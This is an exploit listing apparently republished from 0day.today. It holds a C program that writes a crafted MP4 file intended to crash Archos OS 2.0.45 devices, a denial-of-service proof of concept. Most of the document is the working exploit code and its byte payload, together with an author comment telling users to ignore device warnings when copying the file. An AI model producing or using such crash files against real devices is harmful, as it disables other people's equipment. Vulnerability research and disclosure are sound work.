Archos OS 2.0.45 MP4 Denial Of Service Exploit

🗓️ 18 May 2011 00:00:00Reported by compl3xType
zdt🔗 0day.today👁 14 Views
Archos OS 2.0.45 MP4 Denial Of Service Exploi
#include <stdio.h>

using namespace std;
/*
----------------------------------------------------------------
                                        888  .d8888b.           
                                        888 d88P  Y88b          
                                        888      .d88P          
 .d8888b .d88b.  88888b.d88b.  88888b.  888     8888"  888  888 
d88P"   d88""88b 888 "888 "88b 888 "88b 888      "Y8b. `Y8bd8P' 
888     888  888 888  888  888 888  888 888 888    888   X88K   
Y88b.   Y88..88P 888  888  888 888 d88P 888 Y88b  d88P .d8""8b. 
 "Y8888P "Y88P"  888  888  888 88888P"  888  "Y8888P"  888  888 
                               888                              
                               888                              
                               888                    
-----------------------------------------------------------------
Title: Archos OS 2.0.45 MP4 Denial Of Service Exploit
Author: compl3x
Site: compl3x.wordpress.com
Contact: [email protected]
Twitter: @Complex360
Versions Affected: All (<= 2.0.45)
Stuffs: 1337day.com posted my Archos OS 2.0.45 GIF DOS Exploit, even though I told them there was an issue with it.
        Nothing destructive, just not properly presented. Tried to find a security guy from Archos, it's difficult.
		Also, Archos, if you patch my 2 vulns, PLEASE make the new build version 2.0.48, I'll nerdgasm.

Ignore prompts about incompatability between device and filetype when copying to device, it WILL work.
*/


int main(int argc, char **argv)
{
    unsigned char data[] =
    {
    0x00, 
	0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70, 0x6D, 0x70, 0x34, 0x32, 0x00, 0x00, 0x00, 0x00, 0x69, 
	0x73, 0x6F, 0x6D, 0x6D, 0x70, 0x34, 0x32, 0x00, 0x02, 0x71, 0x95, 0x6D, 0x6F, 0x6F, 0x76, 0x00, 
	0x00, 0x00, 0x6C, 0x6D, 0x76, 0x68, 0x64, 0x00, 0xFE,
	0x00, 0x00, 0x00, 0xFE, 0xFE, 0x00, 0xFE, 0x00, 0xFE, 0xFE, 0xFE, 0xFE, 0xFE, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x33, 0x00, 0x00, 0x66, 0x00, 0x00,
    0x99, 0x00, 0x00, 0xCC, 0x00, 0x00, 0xFE, 0x00, 0x33, 0x00, 0x00, 0x33, 0x33, 0x00, 0x33, 0x66,
    0x00, 0x33, 0x99, 0x00, 0x33, 0xCC, 0x00, 0x33, 0xFE, 0x00, 0x66, 0x00, 0x00, 0x66, 0x33, 0x00,
    0x66, 0x66, 0x00, 0x66, 0x99, 0x00, 0x66, 0xCC, 0x00, 0x66, 0xFE, 0x00, 0x99, 0x00, 0x00, 0x99,
    0x33, 0x00, 0x99, 0x66, 0x00, 0x99, 0x99, 0x00, 0x99, 0xCC, 0x00, 0x99, 0xFE, 0x00, 0xCC, 0x00,
    0x00, 0xCC, 0x33, 0x00, 0xCC, 0x66, 0x00, 0xCC, 0x99, 0x00, 0xCC, 0xCC, 0x00, 0xCC, 0xFE, 0x00,
    0xFE, 0x00, 0x00, 0xFE, 0x33, 0x00, 0xFE, 0x66, 0x00, 0xFE, 0x99, 0x00, 0xFE, 0xCC, 0x00, 0xFE,
    0xFE, 0x33, 0x00, 0x00, 0x33, 0x00, 0x33, 0x33, 0x00, 0x66, 0x33, 0x00, 0x99, 0x33, 0x00, 0xCC,
    0x33, 0x00, 0xFE, 0x33, 0x33, 0x00, 0x33, 0x33, 0x33, 0x33, 0x33, 0x66, 0x33, 0x33, 0x99, 0x33,
    0x33, 0xCC, 0x33, 0x33, 0xFE, 0x33, 0x66, 0x00, 0x33, 0x66, 0x33, 0x33, 0x66, 0x66, 0x33, 0x66,
    0x99, 0x33, 0x66, 0xCC, 0x33, 0x66, 0xFE, 0x33, 0x99, 0x00, 0x33, 0x99, 0x33, 0x33, 0x99, 0x66,
    0x33, 0x99, 0x99, 0x33, 0x99, 0xCC, 0x33, 0x99, 0xFE, 0x33, 0xCC, 0x00, 0x33, 0xCC, 0x33, 0x33,
    0xCC, 0x66, 0x33, 0xCC, 0x99, 0x33, 0xCC, 0xCC, 0x33, 0xCC, 0xFE, 0x33, 0xFE, 0x00, 0x33, 0xFE,
    0x33, 0x33, 0xFE, 0x66, 0x33, 0xFE, 0x99, 0x33, 0xFE, 0xCC, 0x33, 0xFE, 0xFE, 0x66, 0x00, 0x00,
    0x66, 0x00, 0x33, 0x66, 0x00, 0x66, 0x66, 0x00, 0x99, 0x66, 0x00, 0xCC, 0x66, 0x00, 0xFE, 0x66,
    0x33, 0x00, 0x66, 0x33, 0x33, 0x66, 0x33, 0x66, 0x66, 0x33, 0x99, 0x66, 0x33, 0xCC, 0x66, 0x33,
    0xFE, 0x66, 0x66, 0x00, 0x66, 0x66, 0x33, 0x66, 0x66, 0x66, 0x66, 0x66, 0x99, 0x66, 0x66, 0xCC,
    0x66, 0x66, 0xFE, 0x66, 0x99, 0x00, 0x66, 0x99, 0x33, 0x66, 0x99, 0x66, 0x66, 0x99, 0x99, 0x66,
    0x99, 0xCC, 0x66, 0x99, 0xFE, 0x66, 0xCC, 0x00, 0x66, 0xCC, 0x33, 0x66, 0xCC, 0x66, 0x66, 0xCC,
    0x99, 0x66, 0xCC, 0xCC, 0x66, 0xCC, 0xFE, 0x66, 0xFE, 0x00, 0x66, 0xFE, 0x33, 0x66, 0xFE, 0x66,
    0x66, 0xFE, 0x99, 0x66, 0xFE, 0xCC, 0x66, 0xFE, 0xFE, 0x99, 0x00, 0x00, 0x99, 0x00, 0x33, 0x99,
    0x00, 0x66, 0x99, 0x00, 0x99, 0x99, 0x00, 0xCC, 0x99, 0x00, 0xFE, 0x99, 0x33, 0x00, 0x99, 0x33,
    0x33, 0x99, 0x33, 0x66, 0x99, 0x33, 0x99, 0x99, 0x33, 0xCC, 0x99, 0x33, 0xFE, 0x99, 0x66, 0x00,
    0x99, 0x66, 0x33, 0x99, 0x66, 0x66, 0x99, 0x66, 0x99, 0x99, 0x66, 0xCC, 0x99, 0x66, 0xFE, 0x99,
    0x99, 0x00, 0x99, 0x99, 0x33, 0x99, 0x99, 0x66, 0x99, 0x99, 0x99, 0x99, 0x99, 0xCC, 0x99, 0x99,
    0xFE, 0x99, 0xCC, 0x00, 0x99, 0xCC, 0x33, 0x99, 0xCC, 0x66, 0x99, 0xCC, 0x99, 0x99, 0xCC, 0xCC,
    0x99, 0xCC, 0xFE, 0x99, 0xFE, 0x00, 0x99, 0xFE, 0x33, 0x99, 0xFE, 0x66, 0x99, 0xFE, 0x99, 0x99,
    0xFE, 0xCC, 0x99, 0xFE, 0xFE, 0xCC, 0x00, 0x00, 0xCC, 0x00, 0x33, 0xCC, 0x00, 0x66, 0xCC, 0x00,
    0x99, 0xCC, 0x00, 0xCC, 0xCC, 0x00, 0xFE, 0xCC, 0x33, 0x00, 0xCC, 0x33, 0x33, 0xCC, 0x33, 0x66,
    0xCC, 0x33, 0x99, 0xCC, 0x33, 0xCC, 0xCC, 0x33, 0xFE, 0xCC, 0x66, 0x00, 0xCC, 0x66, 0x33, 0xCC,
    0x66, 0x66, 0xCC, 0x66, 0x99, 0xCC, 0x66, 0xCC, 0xCC, 0x66, 0xFE, 0xCC, 0x99, 0x00, 0xCC, 0x99,
    0x33, 0xCC, 0x99, 0x66, 0xCC, 0x99, 0x99, 0xCC, 0x99, 0xCC, 0xCC, 0x99, 0xFE, 0xCC, 0xCC, 0x00,
    0xCC, 0xCC, 0x33, 0xCC, 0xCC, 0x66, 0xCC, 0xCC, 0x99, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xFE, 0xCC,
    0xFE, 0x00, 0xCC, 0xFE, 0x33, 0xCC, 0xFE, 0x66, 0xCC, 0xFE, 0x99, 0xCC, 0xFE, 0xCC, 0xCC, 0xFE,
    0xFE, 0xFE, 0x00, 0x00, 0xFE, 0x00, 0x33, 0xFE, 0x00, 0x66, 0xFE, 0x00, 0x99, 0xFE, 0x00, 0xCC,
    0xFE, 0x00, 0xFE, 0xFE, 0x33, 0x00, 0xFE, 0x33, 0x33, 0xFE, 0x33, 0x66, 0xFE, 0x33, 0x99, 0xFE,
    0x33, 0xCC, 0xFE, 0x33, 0xFE, 0xFE, 0x66, 0x00, 0xFE, 0x66, 0x33, 0xFE, 0x66, 0x66, 0xFE, 0x66,
    0x99, 0xFE, 0x66, 0xCC, 0xFE, 0x66, 0xFE, 0xFE, 0x99, 0x00, 0xFE, 0x99, 0x33, 0xFE, 0x99, 0x66,
    0xFE, 0x99, 0x99, 0xFE, 0x99, 0xCC, 0xFE, 0x99, 0xFE, 0xFE, 0xCC, 0x00, 0xFE, 0xCC, 0x33, 0xFE,
    0xCC, 0x66, 0xFE, 0xCC, 0x99, 0xFE, 0xCC, 0xCC, 0xFE, 0xCC, 0xFE, 0xFE, 0xFE, 0x00, 0xFE, 0xFE,
    0x33, 0xFE, 0xFE, 0x66, 0xFE, 0xFE, 0x99, 0xFE, 0xFE, 0xCC, 0xFE, 0xFE, 0xFE, 0x21, 0xF9, 0x04,
    0x01, 0x00, 0x00, 0x10, 0x00, 0x2C, 0xF0, 0x00, 0xF0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08,
    0x04, 0x00, 0xFE, 0x05, 0x04, 0x00, 0x3B,
    } ;

    printf("\n[+] Archos OS 2.0.45 MP4 Crash Bug By Complex <[email protected]>");

    if(argc != 2)
    {
        printf("[+] Usage: %s <filename.mp4>\n", argv[0]);
        return 0;
    }

    FILE* pFile;
    pFile = fopen(argv[1], "wb");
    if(pFile == NULL)
    {
        printf("[-] Error creating file");
        return 0;
    }

    fwrite(data, 1, sizeof(data), pFile);

    printf("[+] File: \"%s\"\n", argv[1]);
    printf("[+] Written %d bytes\n", sizeof(data));

    fclose(pFile);

    return 0;
}



#  0day.today [2018-04-02]  #
18 May 2011 00:00Current
7High risk
Vulners AI Score7
archos os 2.0.45 mp4 denial of service exploit compl3x 1337day vulnerability patch version 2.0.48